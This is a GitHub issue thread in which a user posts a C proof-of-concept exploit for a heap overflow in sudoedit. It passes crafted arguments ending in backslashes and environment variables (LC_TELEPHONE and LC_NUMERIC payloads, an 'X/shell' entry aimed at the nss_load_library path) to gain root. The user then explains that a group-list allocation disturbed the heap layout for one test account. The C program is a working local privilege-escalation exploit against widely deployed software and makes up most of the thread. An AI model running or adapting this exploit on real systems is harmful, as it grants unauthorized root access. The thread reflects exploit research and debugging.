Work when uid=0, but not uid=1000 #8

Closed
GeraldYan opened this issue Feb 3, 2021 · 1 comment
Comments

@GeraldYan

hi,
The PoC script did not work in my Ubuntu 20.04.1 environment, so I tried to make my own PoC script based on the fuzz and exploit method.
For debugging convenience, I did this with the root user. After some work, a PoC worked with the nss_load_library() method.
But when switching to a general user, the script did not work, because the heap chunk I used to overflow was pre-allocated and stored something like groups=4,24,27,30,46,120,131,132,1000.
I have no idea why this happened. I want to know what the difference is between running this script as the root user and as a normal user. Looking forward to your help. Thanks!

Here is my poc.

```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <ctype.h>

#define SUDOEDIT_PATH "/usr/bin/sudoedit"

int main(int argc, char *argv[]) {
 char *s_argv[]={
  "sudoedit",
  "-s",
  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
  "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB\\",
  NULL
 };

 char *s_envp[]={
  "B=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB\\",
  "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
  "X/shell","\\",
  "LC_TELEPHONE=C.UTF-8@Aa3QLwXb3PJLmiDQinnGV9WSiGrxWfRd04R1I2kOLtQyEvuehEJTM7yffnSZwxBdlOaevjyiYbA0wUMP7oPZ",
  "LC_NUMERIC=C.UTF-8@AwuefJrxO4MZdmyVPaVPYnPNVkMkkTZSKDmPTTYlKbE",
  "AgvAS=AKz0",
  NULL
 };

 printf("GOOD LUCK \n");
 printf("%d\n", getuid());
 printf("the pid is: %d\n", getpid());
 for(int i=0;i<10;i++){
     // wait to attach a debugger to this pid before the exec
     printf("%d\n", i);
     sleep(1);
 }
 // execve only returns on failure; report why so a bad path or
 // permission problem is not mistaken for the exploit not working
 execve(SUDOEDIT_PATH, s_argv, s_envp);
 perror("execve");

 return 1;
}
```

@GeraldYan
Author

I found the reason. This is because, in sudo.c, get_user_groups() took my heap chunk away, because my test user happens to belong to 9 groups. Just change to another general user.
